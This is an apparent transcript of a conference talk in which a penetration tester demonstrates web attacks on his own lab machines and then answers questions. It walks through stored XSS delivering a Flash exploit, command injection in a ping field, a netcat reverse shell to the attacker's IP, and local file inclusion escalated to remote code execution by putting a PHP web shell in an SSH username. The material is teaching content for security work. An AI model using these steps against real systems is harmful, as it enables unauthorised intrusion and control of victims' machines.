So let's see. I do have some protection mechanisms on this machine as well, I believe. Are we on the right one? Yes, I believe we are. So I don't want to prevent myself from hacking myself. So I'm just making sure that we don't have any like traps, Palo Alto traps is on the system, and I don't want it to block me. So let's log on to the solution first. 56.134, right. So we're now on the elite host's machine, Netsecurity.no, password is Charlie. And we do have the contact support up here. So yay, we just stole another cookie. But forget about that. The attacker now wants to escalate his privileges. So what the attacker will do, from his Linux machine, it will ready. Actually, I'll just do I will ready my little server. So I type in exploit, and it takes all my parameters and options. It takes the exploit, takes my payload, and it readies it for exploitation at the following URL. So notice my HTTP 126.8.56.50 at port 8080/hacked. If anyone visits that URL, I will try send them my little flash exploit and see if I can actually take over something. Notice also the payload I'm using. So the exploit is the part that actually kicks through the buffers, takes over your computer system. But the payload is actually what will run when we actually took over the computer system. The payload could be like, look, add another user on the system. It could be, give me a shell. It could be, give me VNC. And VNC is GUI. So that's why I'm using that one. So we'll just take this little URL. And all we need to do, we'll add another contact us support message, hi, with an iframe, src. We'll point it to this, sign it, and notice that it says 4 not found down in the window now. I could, of course, hide this 100%, right? I could set the width and the height to be 0 pixels. But if we now visit, if we visit this contact us support from a browser that is vulnerable, let's go into our Windows 7. We might see something else, or the demo could fail, who knows. Well, let's look at this. There we go. Firefox has prevented the outdated plugin Adobe Flash from running. That is cool. Let's allow that one. We're smart. Allow and remember. Yes. Are you sure you want to run this? This is old, my friend. And we're like, nothing happened. But when we open our Linux machine, we no longer see Linux. We see Windows. Look at this. We are actually on the machine. So if I go to Windows 7, open up Notepad, this is a super secret message. We go to our Linux machine, we can see that we are actually on the machine. So that is one way cross-site scripting is being used to redirect and control where users are going to send them exploits. And the exploits will be hosted at not the attacker's machine, they will be hosted at already compromised victim machines. And the attackers will be controlling those machines over the Tor network most of the time. So it's kind of hard to bust these guys when they do it over a Tor network, but it does happen. We actually had one server where so they were using the Tor network to stay anonymous. So they were trying to get payments for ransomware. You guys heard about WannaCry, I'm sure. Who didn't? Because the media really made a storm out of that for some reason. And they'll want some payment, and they very often instruct you to download the Tor browser, go into the following onion site, and make the payments to this onion site. But the thing is that, look, you're hosting a website on a Tor network. This thing you're hosting is also connected to the internet somewhere. So we managed to profile the web page and find its real web page and its real IPv4 web page just by doing Google searching. And then what do you do? Well, we found like a vulnerability on the system. It's not a big vulnerability. We didn't hack someone without permission. We just did this little simple thing up here. We did this little simple thing up here. We typed in server-status. This is all we did. And then we saw all the people making payments. And then we saw the administrators doing admin work, to like admin.php, add so-and-so, blah, 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 blah. And that's where it gets interesting. And then we hope like, oh, we have IP addresses. So you have vhosts, you have clients. So we have IP addresses. But those IP addresses were also the Tor network. So they were not only using the Tor network to host their command and control platform, they were also administrating that via the Tor network, making it like 2 layers of Tor network, making it harder. So yeah, let's see what else we have time for. I'm back into my Presso. Any questions on this, by the way? It's pretty cool with using cross-site scripting for exploit delivery. That's what exploit kits very often do. So I was thinking, as my final demo, I was hoping to show you guys what we call local file inclusion to a shell. So shells, basically, first of all, I'll do a very, very quick demo of how we use a command injection to give ourselves a shell. A command injection is just so very easy to show you guys, so I'll just do it quickly. So let's see, we have our logged in user here. So up here, we can ping something, right? So I can ping IP addresses. I can ping these 3 IP addresses. Can I ping my own? Oh, actually, I don't want to spoil everything here, so let me delete everything and log back in. So let's do, what's it, Trond at netsecurity.no, summer 2016, 17, damn it. Netsecurity.no, summer 2016, yes. So we can ping stuff. And the funny thing about command injection is that you try to make, look, when I do a ping of 127.0.1, I'm pinging something I shouldn't be pinging. And when we see the result, it looks like it's coming from the operating system's ping, right? It looks like the ping we run from our terminals, from our bash, from our CMDs. So it could be that the developer was lazy and just took the implementation of ping and used it for his web page. That's good. We like lazy developers. But did he really like protect this command at all? Like, how do you, it's actually count. Look, I could just, into the command right now, I could tell it to ping just 1 time. That is interesting, right? So immediately we should be thinking, oh, look, well, maybe we can do like a semicolon ls. And we see like, ooh, there's source. Like, so we could do like a cat etc password. This is all easy, right? And we can see like the password file. Hopefully we're not root. We're not root. All right. Because the guy who set up the system is like, woohoo. But there is a very much easier way to get like a working shell from this. Any ideas on how to make this work better? How can we run commands more interactively?
Execute bash.
Execute bin bash. How would you do that? Oh, just like here, like this?
Yeah.
Oh, that's not going to work. Because where is your standard output, standard input going to go? It's just going to go to some thread in the web server, and it's going to be, hey, no, I don't know. Doesn't know how to deal with that.
You can SSH to another machine and then reverse.
Right, I like the idea. But there's actually something more simpler. Anyone heard of Netcat before? Netcat, is it pre-installed on our systems? Pretty much, yes. So what we can do netcat to the target IP address, like to the IP address of the attacker, netcat 56.1, connect to port 1588, some just random number, and execute bin bash. Now, netcat will take the standard output, standard input, standard error, and fix all that stuff for me. But this implies that I need to have a server on 56.1, which is this system. So I'll set up a netcat listener on my Windows system. Listen verbosely port 1508, enter, submit, and let's see what happens. Nothing happens. It's just waiting for, and suddenly it says, yes, I got a connection. Can we now do like pwd? Yes. Can we do ls? Yes. Can we do cd/ls? Yes. So this is like an interactive shell. Much, much cooler, much more better. So command injections to an interactive shell. But wait, I want to show you guys something really interesting, and this is my final demo. There is this script about us. It doesn't have any inputs down here, but notice up here, it says page equals include.php. Any ideas what we can do with this? Like it points to a file, right? Can we point it to any file? Well, maybe. Let's try to do like a ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// Does it really care how far I go? Not really. So I'll just try to give it a path. // means, hey, jump one level up. And I'll try to include the file etc password. And it gives me the password file. This is what we call a local file inclusion. It's a not too common vulnerability, but we do see it somewhere. How can we turn this into a working interactive shell like the one we just had? That is the challenge, and that is going to be cool, because there are ways to do this. Think about the keyword. This page equals, it said page equals include.php. So he's adding some kind of functionality to the page, right? Like it could be from a menu click, you would include like the guest book or the paying functionality. It could be anything. But it's including something from a file. And this inclusion is it's not just reading a file and putting the outputs out there. It's including it and parsing it and interpreting it as PHP. So what if our little etc password file had PHP code in it? Well, then it would actually be PHP code being interpreted. But we don't have any usernames that are PHP code. But let's explore our little file system a little more. We don't have a lot of time, so I'll just jump straight to the point. Let's go into var log. And we could, for example, do the access log, include the access log of the web server, or we could do the auth log. I like the auth log. And in here, we have usernames in here. You can see that, look, the root user, the root user has been logging in several times here. What if I open up my PuTTY and I try to SSH to this box, 192.168.56.134, and I'll type in the username was blug, random password, and let's refresh this page and see if we can actually get something back for us here. There we go. Look, we can make this log say something, right? We can make it say blug, and it's being included to the page. Are you guys thinking what I'm thinking? Can we log on with like a PHP, legitimate PHP code password or username? So we're going to have to be the username. Well, let's try. Let's try, see what happens. And this is where an attacker has to be really, really careful. Because if you make one typo in here, you're going to include this log file, and it's going to be broken. Like the PHP code will not interpret, so it's just going to go error and break. So let's start with our PHP code up here. Let's do like yes, it works. And let's do like an echo system from the get array, cmd. Actually, just call C, just in case there's any limitations on maximum characters. Oh, semicolon, like this. Looks good. Any typos? So I'll log in at this, right? So this is PHP code. We could probably shorten out the PHP a bit more, like a question mark equals or something like that. But system blah, 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 blah. I think it looks good. Then we do random password, access denied as expected, refresh the page, and we had our blug down here. So invalid user, we're looking for invalid user. Let's see. Failed password for invalid user blog. Yes, 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 yes. That's good. Oh, there we go. Look. Login name empty. That's a good sign. Because something is hiding in the login name, potentially the PHP interpreter. So we said, look, execute anything that comes into the get array up here. So it's called C. What would we like a C equals like cat at the C password. Oh, there we go. Look at this. There it is. So that's cool, right? So suddenly we can now do same attack as before. Netcat to attacking machine, 168.56.1. Same port, execute bin bash. Set up our listener first. Huh? Oi. Yeah. You actually, have you ever seen what happens when you type too many numbers into IP addresses? It rotates. Like it starts, it overflows. It's very, very weird. If we had time, I'll show you guys, man. Let's see. If you try to ping like 9,000, 9,000, 9,000, 9,000, it will actually ping something within the range of 255. It's weird. And there we go, like at the C. Right. Cool. That's it, folks. I think we have to leave. So thank you very much. Do we have time for questions? Hit me. It's a standard, typical Norwegian crowd. It's very silent. Like.
So what happens if the server does not have SSH enabled? Can't really do anything.
This whole field of study requires you to be curious and also thinking outside the box. If you only focus on the problem, you're not going to get anywhere. So you need to be like thinking outside the box. And when you don't have SSH, what do you do then? You'll have to find some other way. And I'll tell you a story later on how I broke into Microsoft Azure's servers, basically thinking outside the box, using the environment variables to actually launch cross-site scripting attacks against the administrators of Azure. That's cool. But you have to basically, there's a new situation every time. You can't just apply this attack everywhere. It's going to be something new, something different, tweak and adapt.
What kind of distribution of operating systems do you find when you go pen testing?
There's a lot of Microsoft, a lot of Linux here and there, but a lot of Microsoft, yeah.
So OS X or BSD servers?
I don't know, never OS X, never seen that before. I found a system, Windows NT system for a client. That was like, whoa, never seen that before. I don't think I was born back then. But I didn't touch it because I was afraid. But no, I don't see a lot of variety that much. A lot of the pen testing comes externally. However, when we do internal pen tests, like simulating what an insider could do, like what a malicious employee could do, that's when you start to see weird things. And that's when you get to see a different types of operating systems as well. So I remember one client I was at, and the first day this IT admin starts bragging about his uptime on his Linux server. I'm at 850 days, don't you mess with my uptime, boy. All right, 850 days, I know exactly what I'm gonna do. That dirty cow is gonna work, yes. Because he hasn't been updating his kernel for 850 days, right? So.
That's within shell shock, wasn't it?
Oh, shell shock would have been working if he had any CGI scripts. It's like yes, 850 days. Cool. Thanks for having me, guys.